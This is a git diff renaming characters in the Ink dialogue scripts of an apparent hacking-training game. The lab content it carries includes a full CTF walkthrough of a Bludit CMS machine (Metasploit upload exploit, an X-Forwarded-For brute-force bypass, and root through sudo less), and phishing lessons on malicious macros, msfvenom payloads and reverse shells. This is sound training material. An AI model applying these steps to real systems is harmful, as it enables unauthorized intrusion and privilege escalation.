Coordinator: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups + Haxolottle: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups - CTF Challenge Coordinator: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) + Haxolottle: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) - CTF Challenge Coordinator: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible + Haxolottle: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible ~ instructor_rapport += 5 + [Walk me through the exploitation] - CTF Challenge Coordinator: Here's the complete exploitation process: + Haxolottle: Here's the complete exploitation process: - CTF Challenge Coordinator: 1. Start Metasploit: msfconsole + Haxolottle: 1. Start Metasploit: msfconsole - CTF Challenge Coordinator: 2. Search: search bludit + Haxolottle: 2. Search: search bludit - CTF Challenge Coordinator: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec + Haxolottle: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec - CTF Challenge Coordinator: 4. Show options: show options + Haxolottle: 4. Show options: show options - CTF Challenge Coordinator: 5. Set target: set RHOSTS TARGET_IP + Haxolottle: 5. Set target: set RHOSTS TARGET_IP - CTF Challenge Coordinator: 6. Set username: set BLUDITUSER admin (or discovered username) + Haxolottle: 6. Set username: set BLUDITUSER admin (or discovered username) - CTF Challenge Coordinator: 7. Set password: set BLUDITPASS + Haxolottle: 7. Set password: set BLUDITPASS - CTF Challenge Coordinator: 8. Run exploit: exploit + Haxolottle: 8. Run exploit: exploit - CTF Challenge Coordinator: If successful, you'll get a Meterpreter shell! This is your foothold in the system. + Haxolottle: If successful, you'll get a Meterpreter shell! This is your foothold in the system. ~ instructor_rapport += 5 - -> guided_mode_hub === phase_3_bruteforce === -CTF Challenge Coordinator: Phase 3 is optional - brute forcing the Bludit password if you only have the username. +Haxolottle: Phase 3 is optional - brute forcing the Bludit password if you only have the username. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. +Haxolottle: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. -CTF Challenge Coordinator: OWASP ZAP can bypass these protections with the right configuration. +Haxolottle: OWASP ZAP can bypass these protections with the right configuration. + [How does CSRF protection work?] - CTF Challenge Coordinator: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. + Haxolottle: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. - CTF Challenge Coordinator: The server sends a token in each response, and the client must include it in the next request. + Haxolottle: The server sends a token in each response, and the client must include it in the next request. - CTF Challenge Coordinator: This prevents simple replay attacks because each request needs the current token. + Haxolottle: This prevents simple replay attacks because each request needs the current token. - CTF Challenge Coordinator: OWASP ZAP can extract tokens from responses and insert them into requests automatically. + Haxolottle: OWASP ZAP can extract tokens from responses and insert them into requests automatically. ~ instructor_rapport += 5 + [How does rate limiting protection work?] - CTF Challenge Coordinator: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. + Haxolottle: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. - CTF Challenge Coordinator: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." + Haxolottle: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." - CTF Challenge Coordinator: However, we can bypass this using the X-Forwarded-For HTTP header. + Haxolottle: However, we can bypass this using the X-Forwarded-For HTTP header. - CTF Challenge Coordinator: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. + Haxolottle: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. ~ instructor_rapport += 5 + [Walk me through the ZAP brute force process] - CTF Challenge Coordinator: This is complex, so pay attention: + Haxolottle: This is complex, so pay attention: - CTF Challenge Coordinator: 1. Launch OWASP ZAP and configure it as a proxy + Haxolottle: 1. Launch OWASP ZAP and configure it as a proxy - CTF Challenge Coordinator: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts + Haxolottle: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts - CTF Challenge Coordinator: 3. Browse to the Bludit login page through ZAP + Haxolottle: 3. Browse to the Bludit login page through ZAP - CTF Challenge Coordinator: 4. Attempt a login to capture the HTTP request in ZAP's history + Haxolottle: 4. Attempt a login to capture the HTTP request in ZAP's history - CTF Challenge Coordinator: 5. Right-click the POST request and select "Fuzz..." + Haxolottle: 5. Right-click the POST request and select "Fuzz..." - CTF Challenge Coordinator: 6. Select the password field and add a payload with common passwords + Haxolottle: 6. Select the password field and add a payload with common passwords - CTF Challenge Coordinator: 7. Add the X-Forwarded-For script as a message processor + Haxolottle: 7. Add the X-Forwarded-For script as a message processor - CTF Challenge Coordinator: 8. Launch the fuzzer and look for different HTTP response codes + Haxolottle: 8. Launch the fuzzer and look for different HTTP response codes - CTF Challenge Coordinator: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). + Haxolottle: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). ~ instructor_rapport += 5 - -> guided_mode_hub === phase_4_post_exploit === -CTF Challenge Coordinator: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. +Haxolottle: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. ~ instructor_rapport += 5 -CTF Challenge Coordinator: You should have a Meterpreter shell from the exploitation phase. +Haxolottle: You should have a Meterpreter shell from the exploitation phase. -CTF Challenge Coordinator: Now it's time to explore the system, understand your access level, and find flags. +Haxolottle: Now it's time to explore the system, understand your access level, and find flags. + [What Meterpreter commands should I use?] - CTF Challenge Coordinator: Essential Meterpreter commands for exploration: + Haxolottle: Essential Meterpreter commands for exploration: - CTF Challenge Coordinator: getuid - Shows your current username + Haxolottle: getuid - Shows your current username - CTF Challenge Coordinator: sysinfo - System information (OS, architecture, etc.) + Haxolottle: sysinfo - System information (OS, architecture, etc.) - CTF Challenge Coordinator: pwd - Print working directory + Haxolottle: pwd - Print working directory - CTF Challenge Coordinator: ls - List files in current directory + Haxolottle: ls - List files in current directory - CTF Challenge Coordinator: cat filename - Read file contents + Haxolottle: cat filename - Read file contents - CTF Challenge Coordinator: cd /path - Change directory + Haxolottle: cd /path - Change directory - CTF Challenge Coordinator: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) + Haxolottle: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) ~ instructor_rapport += 5 + [Where should I look for flags?] - CTF Challenge Coordinator: Flags are hidden in various locations: + Haxolottle: Flags are hidden in various locations: - CTF Challenge Coordinator: Check your current directory - there might be a flag right where you land + Haxolottle: Check your current directory - there might be a flag right where you land - CTF Challenge Coordinator: Look in user home directories: /home/username/ + Haxolottle: Look in user home directories: /home/username/ - CTF Challenge Coordinator: Different users might have different flags + Haxolottle: Different users might have different flags - CTF Challenge Coordinator: Eventually, you'll need to check /root/ but that requires privilege escalation + Haxolottle: Eventually, you'll need to check /root/ but that requires privilege escalation - CTF Challenge Coordinator: Some flags might be in encrypted files - note encryption hints for later + Haxolottle: Some flags might be in encrypted files - note encryption hints for later ~ instructor_rapport += 5 + [How do I switch users?] - CTF Challenge Coordinator: To switch users, you need to drop to an OS shell first: + Haxolottle: To switch users, you need to drop to an OS shell first: - CTF Challenge Coordinator: From Meterpreter, run: shell + Haxolottle: From Meterpreter, run: shell - CTF Challenge Coordinator: Now you have a Linux shell. Use: su username + Haxolottle: Now you have a Linux shell. Use: su username - CTF Challenge Coordinator: However, you'll need the user's password to switch + Haxolottle: However, you'll need the user's password to switch - CTF Challenge Coordinator: If you discovered the Bludit admin user's password earlier, you can switch to that user + Haxolottle: If you discovered the Bludit admin user's password earlier, you can switch to that user - CTF Challenge Coordinator: Return to Meterpreter with Ctrl-C when done + Haxolottle: Return to Meterpreter with Ctrl-C when done ~ instructor_rapport += 5 - -> guided_mode_hub === phase_5_privesc === -CTF Challenge Coordinator: Phase 5 is privilege escalation - gaining root access to fully control the system. +Haxolottle: Phase 5 is privilege escalation - gaining root access to fully control the system. ~ instructor_rapport += 5 -CTF Challenge Coordinator: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. +Haxolottle: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. -CTF Challenge Coordinator: To access all system files and read flags in /root/, you need to escalate to root. +Haxolottle: To access all system files and read flags in /root/, you need to escalate to root. + [How do I check my privileges?] - CTF Challenge Coordinator: From a shell, check your privileges: + Haxolottle: From a shell, check your privileges: - CTF Challenge Coordinator: whoami - Shows your username + Haxolottle: whoami - Shows your username - CTF Challenge Coordinator: id - Shows UID, GID, and groups + Haxolottle: id - Shows UID, GID, and groups - CTF Challenge Coordinator: sudo -l - Lists commands you can run with sudo + Haxolottle: sudo -l - Lists commands you can run with sudo - CTF Challenge Coordinator: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' - CTF Challenge Coordinator: This spawns a proper terminal that sudo will accept. + Haxolottle: This spawns a proper terminal that sudo will accept. ~ instructor_rapport += 5 + [What's the sudo privilege escalation method?] - CTF Challenge Coordinator: When you run sudo -l, you'll see what commands you can run as root. + Haxolottle: When you run sudo -l, you'll see what commands you can run as root. - CTF Challenge Coordinator: If you can run /usr/bin/less with sudo, that's your ticket to root! + Haxolottle: If you can run /usr/bin/less with sudo, that's your ticket to root! - CTF Challenge Coordinator: The 'less' command is a pager for viewing files, but it can also execute shell commands. + Haxolottle: The 'less' command is a pager for viewing files, but it can also execute shell commands. - CTF Challenge Coordinator: When viewing a file with less, press ! followed by a command to execute it. + Haxolottle: When viewing a file with less, press ! followed by a command to execute it. - CTF Challenge Coordinator: Since less is running with sudo privileges, any command you run will execute as root! + Haxolottle: Since less is running with sudo privileges, any command you run will execute as root! ~ instructor_rapport += 5 + [Walk me through getting root access] - CTF Challenge Coordinator: Here's the complete privilege escalation process: + Haxolottle: Here's the complete privilege escalation process: - CTF Challenge Coordinator: 1. Drop to shell from Meterpreter: shell + Haxolottle: 1. Drop to shell from Meterpreter: shell - CTF Challenge Coordinator: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' + Haxolottle: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' - CTF Challenge Coordinator: 3. Check sudo permissions: sudo -l + Haxolottle: 3. Check sudo permissions: sudo -l - CTF Challenge Coordinator: 4. You should see you can run less on a specific file + Haxolottle: 4. You should see you can run less on a specific file - CTF Challenge Coordinator: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file + Haxolottle: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file - CTF Challenge Coordinator: 6. When the file is displayed, type: !id + Haxolottle: 6. When the file is displayed, type: !id - CTF Challenge Coordinator: 7. You should see uid=0 (root!) in the output + Haxolottle: 7. You should see uid=0 (root!) in the output - CTF Challenge Coordinator: 8. Now type: !/bin/bash + Haxolottle: 8. Now type: !/bin/bash - CTF Challenge Coordinator: 9. You now have a root shell! Verify with: whoami + Haxolottle: 9. You now have a root shell! Verify with: whoami - CTF Challenge Coordinator: Now you can access /root/ and find the final flags! + Haxolottle: Now you can access /root/ and find the final flags! ~ instructor_rapport += 5 - -> guided_mode_hub === complete_walkthrough === -CTF Challenge Coordinator: Here's the complete solution walkthrough from start to finish: +Haxolottle: Here's the complete solution walkthrough from start to finish: ~ instructor_rapport += 10 ~ ctf_mastery += 20 -CTF Challenge Coordinator: **Phase 1 - Reconnaissance:** +Haxolottle: **Phase 1 - Reconnaissance:** -CTF Challenge Coordinator: nmap -sV -p- TARGET_IP +Haxolottle: nmap -sV -p- TARGET_IP -CTF Challenge Coordinator: dirb http://TARGET_IP +Haxolottle: dirb http://TARGET_IP -CTF Challenge Coordinator: nikto -h http://TARGET_IP +Haxolottle: nikto -h http://TARGET_IP -CTF Challenge Coordinator: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials +Haxolottle: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials -CTF Challenge Coordinator: **Phase 2 - Exploitation:** +Haxolottle: **Phase 2 - Exploitation:** -CTF Challenge Coordinator: msfconsole +Haxolottle: msfconsole -CTF Challenge Coordinator: search bludit +Haxolottle: search bludit -CTF Challenge Coordinator: use exploit/linux/http/bludit_upload_images_exec +Haxolottle: use exploit/linux/http/bludit_upload_images_exec -CTF Challenge Coordinator: set RHOSTS TARGET_IP +Haxolottle: set RHOSTS TARGET_IP -CTF Challenge Coordinator: set BLUDITUSER admin (or discovered username) +Haxolottle: set BLUDITUSER admin (or discovered username) -CTF Challenge Coordinator: set BLUDITPASS discovered_password +Haxolottle: set BLUDITPASS discovered_password -CTF Challenge Coordinator: exploit +Haxolottle: exploit -CTF Challenge Coordinator: **Phase 3 - Post-Exploitation:** +Haxolottle: **Phase 3 - Post-Exploitation:** -CTF Challenge Coordinator: getuid, sysinfo, ls, cat flag.txt (in current directory) +Haxolottle: getuid, sysinfo, ls, cat flag.txt (in current directory) -CTF Challenge Coordinator: shell +Haxolottle: shell -CTF Challenge Coordinator: su bludit_admin (with discovered password) +Haxolottle: su bludit_admin (with discovered password) -CTF Challenge Coordinator: cat ~/flag.txt (in that user's home) +Haxolottle: cat ~/flag.txt (in that user's home) -CTF Challenge Coordinator: **Phase 4 - Privilege Escalation:** +Haxolottle: **Phase 4 - Privilege Escalation:** -CTF Challenge Coordinator: python3 -c 'import pty; pty.spawn("/bin/bash")' +Haxolottle: python3 -c 'import pty; pty.spawn("/bin/bash")' -CTF Challenge Coordinator: sudo -l (discover you can run less on a specific file) +Haxolottle: sudo -l (discover you can run less on a specific file) -CTF Challenge Coordinator: sudo /usr/bin/less /path/to/file +Haxolottle: sudo /usr/bin/less /path/to/file -CTF Challenge Coordinator: !id (verify root) +Haxolottle: !id (verify root) -CTF Challenge Coordinator: !/bin/bash (spawn root shell) +Haxolottle: !/bin/bash (spawn root shell) -CTF Challenge Coordinator: cd /root && ls (find final flags) +Haxolottle: cd /root && ls (find final flags) -CTF Challenge Coordinator: That's the complete solution! Try to replicate it yourself now that you understand the approach. +Haxolottle: That's the complete solution! Try to replicate it yourself now that you understand the approach. -> guided_mode_hub diff --git a/story_design/ink/game_scenarios/phishing_social_engineering.ink b/story_design/ink/game_scenarios/phishing_social_engineering.ink index fc690ef..a49cba2 100644 --- a/story_design/ink/game_scenarios/phishing_social_engineering.ink +++ b/story_design/ink/game_scenarios/phishing_social_engineering.ink @@ -32,7 +32,7 @@ VAR completed_spoofing = false VAR completed_attachment = false // Instructor relationship -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR ethical_awareness_shown = false // External variables @@ -43,7 +43,7 @@ EXTERNAL player_name // =========================================== === start === -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 Social Engineering Specialist: Welcome, Agent {player_name}. I'm your instructor for human factors and social engineering. @@ -55,12 +55,12 @@ Social Engineering Specialist: Clear on that? We're learning these techniques to * [Absolutely. I understand the ethical boundaries] ~ ethical_awareness_shown = true - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 You: Understood completely. Authorized testing only, controlled environments, defensive purpose. Social Engineering Specialist: Perfect. That's exactly the mindset we need. Let's begin. -> social_engineering_hub * [Yes, I'm clear on the scope] - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 You: Clear on the ethical constraints. Social Engineering Specialist: Good. Remember that throughout. -> social_engineering_hub @@ -102,7 +102,7 @@ Social Engineering Specialist: What aspect of social engineering and phishing wo === human_factors_intro === ~ intro_human_factors_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Human factors. The foundation of social engineering attacks. @@ -123,7 +123,7 @@ Social Engineering Specialist: The classic saying: "The user is the weakest link -> social_engineering_hub === human_vulnerabilities === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Excellent question. Multiple factors make humans vulnerable: @@ -137,11 +137,11 @@ Social Engineering Specialist: **Information asymmetry**: Attackers know tricks Social Engineering Specialist: **Scale**: Attackers can send thousands of phishing emails. They only need one person to click. The defender has to get it right every time. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -> social_engineering_hub === human_factors_defense === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Good instinct. Defense requires layered approaches: @@ -155,7 +155,7 @@ Social Engineering Specialist: **Culture**: Create organizational culture where Social Engineering Specialist: **Regular testing**: Conduct simulated phishing campaigns to identify vulnerable users and improve training. What we're doing here—authorized, controlled testing. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -164,7 +164,7 @@ Social Engineering Specialist: **Regular testing**: Conduct simulated phishing c === phishing_basics === ~ phishing_basics_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Phishing. One of the most effective attack vectors in cybersecurity. @@ -191,7 +191,7 @@ Social Engineering Specialist: Once they open that attachment, the attacker gain -> social_engineering_hub === spear_phishing_explanation === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Important distinction. @@ -205,11 +205,11 @@ Social Engineering Specialist: This lab simulates spear phishing. You'll researc Social Engineering Specialist: In real-world APT (Advanced Persistent Threat) attacks, spear phishing is often the initial compromise. High-value targets get carefully researched, precisely targeted emails. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === phishing_success_rates === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Disturbingly successful. @@ -226,11 +226,11 @@ Social Engineering Specialist: The economics favor attackers: sending 10,000 phi Social Engineering Specialist: And one successful compromise can be enough. One executive's email account, one developer's credentials, one system admin's access—that's your foothold. -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -> social_engineering_hub === convincing_phishing === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: The art of the convincing phish. Several key elements: @@ -248,7 +248,7 @@ Social Engineering Specialist: **Psychological triggers**: Authority (from execu Social Engineering Specialist: Combine these elements, and you create emails that even security-aware users might trust. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -257,7 +257,7 @@ Social Engineering Specialist: Combine these elements, and you create emails tha === reconnaissance_intro === ~ reconnaissance_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Reconnaissance. The foundation of targeted attacks. @@ -284,7 +284,7 @@ Social Engineering Specialist: **Interest identification**: What are targets pas -> social_engineering_hub === recon_timeframes === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Depends on the operation and target value. @@ -298,12 +298,12 @@ Social Engineering Specialist: The more valuable the target, the more reconnaiss Social Engineering Specialist: For this lab, you'll spend 15-30 minutes on reconnaissance. Enough to understand the organization and personalize attacks, but compressed for training purposes. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 ~ completed_reconnaissance = true -> social_engineering_hub === osint_tools === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Many tools assist OSINT: @@ -323,7 +323,7 @@ Social Engineering Specialist: **Shodan**: Search engine for internet-connected Social Engineering Specialist: For this exercise, you'll manually browse the target website. Simple, but effective for understanding the process. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_reconnaissance = true -> social_engineering_hub @@ -333,7 +333,7 @@ Social Engineering Specialist: For this exercise, you'll manually browse the tar === email_spoofing_intro === ~ email_spoofing_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Email spoofing. Fundamental to convincing phishing. @@ -359,7 +359,7 @@ Social Engineering Specialist: Modern defenses exist: SPF, DKIM, DMARC—technol -> social_engineering_hub === email_authentication === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Good question. Email authentication mechanisms: @@ -373,11 +373,11 @@ Social Engineering Specialist: When properly implemented, these make spoofing mu Social Engineering Specialist: Many organizations haven't configured DMARC. Many email servers don't strictly enforce these policies. Spoofing remains viable in many scenarios. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === spoofing_technique === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: In this lab, spoofing is straightforward. @@ -393,11 +393,11 @@ Social Engineering Specialist: Other spoofing approaches: Social Engineering Specialist: The simulation simplifies this to focus on social engineering tactics rather than technical bypasses. ~ completed_spoofing = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -> social_engineering_hub === email_design_problems === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Excellent critical thinking. @@ -415,7 +415,7 @@ Social Engineering Specialist: Classic security challenge: replacing widely-depl Social Engineering Specialist: Lesson: technical debt and legacy systems create enduring vulnerabilities. Design security in from the start, because retrofitting is painful. -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 -> social_engineering_hub // =========================================== @@ -424,7 +424,7 @@ Social Engineering Specialist: Lesson: technical debt and legacy systems create === malicious_attachments_intro === ~ malicious_attachments_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Malicious attachments. The payload delivery mechanism. @@ -451,7 +451,7 @@ Social Engineering Specialist: The choice depends on your target. Different role -> social_engineering_hub === attachment_targeting === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Matching attachments to targets—critical for success. @@ -467,13 +467,13 @@ Social Engineering Specialist: **General principle**: Send what the target expec Social Engineering Specialist: In this simulation, targets have preferences. Some will only open specific file types. Pay attention to their roles and feedback. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === macro_explanation === ~ macros_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Office macros. Powerful and frequently exploited. @@ -500,7 +500,7 @@ Social Engineering Specialist: Social engineering comes into play: "This documen -> social_engineering_hub === macro_creation === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Creating a malicious macro—walkthrough: @@ -524,12 +524,12 @@ Social Engineering Specialist: **Step 6**: Save as .odt or .ods. Attach to phish Social Engineering Specialist: When victim opens document and enables macros (or if their security is set to low), your payload executes. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === macro_defenses === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Macro defenses—layered approach: @@ -553,11 +553,11 @@ Social Engineering Specialist: The challenge: many organizations legitimately us Social Engineering Specialist: Defense-in-depth: combine technical controls, user awareness, and policy. No single measure is perfect. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === executable_payloads === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Executable malware payloads. More direct than macros. @@ -580,7 +580,7 @@ Social Engineering Specialist: Works better with technical targets who might exp -> social_engineering_hub === msfvenom_payloads === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: msfvenom. Metasploit Framework's payload generator. @@ -604,12 +604,12 @@ Social Engineering Specialist: When victim runs the malware, it connects back to Social Engineering Specialist: msfvenom can generate payloads for any platform, architecture, and access method. Incredibly versatile tool. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === executable_disguises === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Disguising executables—social engineering and technical tricks: @@ -625,7 +625,7 @@ Social Engineering Specialist: **Pretext engineering**: Convince target they nee Social Engineering Specialist: In practice, getting users to run raw executables is harder than macro documents. But with right pretext and target, it works. -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -> social_engineering_hub // =========================================== @@ -634,7 +634,7 @@ Social Engineering Specialist: In practice, getting users to run raw executables === reverse_shells_intro === ~ reverse_shells_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Reverse shells. The goal of attachment-based phishing. @@ -659,7 +659,7 @@ Social Engineering Specialist: Why reverse? Several advantages: -> social_engineering_hub === reverse_shell_mechanics === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Reverse shell mechanics—simple but elegant: @@ -683,11 +683,11 @@ From network monitoring, looks like victim initiated connection to external IP. Social Engineering Specialist: Tools like netcat, msfvenom payloads, custom scripts—all create reverse shell connections. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === post_exploitation_basics === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Post-exploitation. What you do after gaining access. @@ -712,7 +712,7 @@ Basic netcat shells are fragile—no TTY, limited interaction, easily disconnect Social Engineering Specialist: For this lab, simple shell is sufficient to read flags and demonstrate access. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -720,7 +720,7 @@ Social Engineering Specialist: For this lab, simple shell is sufficient to read // =========================================== === attack_workflow === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Complete attack workflow for this lab: @@ -767,7 +767,7 @@ Social Engineering Specialist: **Phase 6 - Objective**: // =========================================== === challenge_tips === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Practical tips for the simulation: @@ -815,7 +815,7 @@ Social Engineering Specialist: **Troubleshooting**: === ethics_discussion === ~ ethics_discussed = true -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Critical topic. Ethical considerations. @@ -844,11 +844,11 @@ Social Engineering Specialist: **Professional responsibility**: Security profess ~ ethical_awareness_shown = true You: Clear on the ethics. Authorized testing, defensive purpose, professional responsibility. Social Engineering Specialist: Excellent. Remember that throughout your career. - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 -> social_engineering_hub === ethical_hacking_discussion === -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 Social Engineering Specialist: "Ethical hacking" without authorization is a contradiction. @@ -866,11 +866,11 @@ Social Engineering Specialist: **Proper approach**: If you identify a vulnerabil Social Engineering Specialist: The distinction is consent. Authorized testing with consent is ethical. Unauthorized testing without consent is not—even with "good intentions." -~ instructor_rapport += 20 +~ haxolottle_rapport += 20 -> social_engineering_hub === pentest_process === -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 Social Engineering Specialist: Legitimate penetration testing process: @@ -902,7 +902,7 @@ Social Engineering Specialist: **Reporting**: Social Engineering Specialist: This structured, authorized, documented process is what makes penetration testing ethical and legal. Everything else is unauthorized hacking. -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 -> social_engineering_hub // =========================================== @@ -939,7 +939,7 @@ Social Engineering Specialist: Remember: in the simulation, victims provide feed Social Engineering Specialist: This is iterative social engineering. First attempt might fail. Adjust and try again. That's realistic—real attackers iterate too. -{instructor_rapport >= 60: +{haxolottle_rapport >= 60: Social Engineering Specialist: You've demonstrated strong understanding and good ethical awareness. You're well-prepared for this exercise. } diff --git a/story_design/ink/game_scenarios/post_exploitation.ink b/story_design/ink/game_scenarios/post_exploitation.ink index 93b1fa1..28f209d 100644 --- a/story_design/ink/game_scenarios/post_exploitation.ink +++ b/story_design/ink/game_scenarios/post_exploitation.ink @@ -4,32 +4,32 @@ // License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR post_exploit_mastery = 0 // External variables EXTERNAL player_name === start === -Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. +Haxolottle: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 ~ post_exploit_mastery = 0 -Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. +Haxolottle: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. -Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. +Haxolottle: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. -Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. +Haxolottle: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. -Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. +Haxolottle: Remember: these are powerful techniques for authorized penetration testing and defensive security only. ~ post_exploit_mastery += 10 -> post_exploit_hub === post_exploit_hub === -Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? +Haxolottle: What aspect of post-exploitation would you like to explore? + [What is post-exploitation?] -> post_exploit_intro @@ -64,231 +64,231 @@ Advanced Tactics Instructor: What aspect of post-exploitation would you like to -> END === post_exploit_intro === -Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. +Haxolottle: Post-exploitation is everything that happens after you successfully compromise a system. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. +Haxolottle: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. -Advanced Tactics Instructor: From there, you need to: +Haxolottle: From there, you need to: understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + [Why not just stop after getting shell access?] - Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + Haxolottle: Initial access is often limited. You might be running as a low-privilege user, not an administrator. - Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + Haxolottle: You need to 